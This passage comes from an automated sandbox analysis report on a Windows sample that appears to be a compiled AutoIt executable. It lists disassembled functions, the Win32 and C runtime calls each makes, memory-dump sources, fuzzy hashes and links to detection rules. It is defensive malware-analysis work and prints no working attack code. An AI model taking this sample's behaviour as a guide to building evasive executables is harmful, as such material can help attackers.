                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 680241177-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004295A0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3938964917-2806939583
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strcat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1765576173-2684727018
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast__wsplitpath_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4163294574-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                                                                                                                                                                                                                                                                                                                • _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3199840319-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3403648963-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00414A8D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2800547568-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
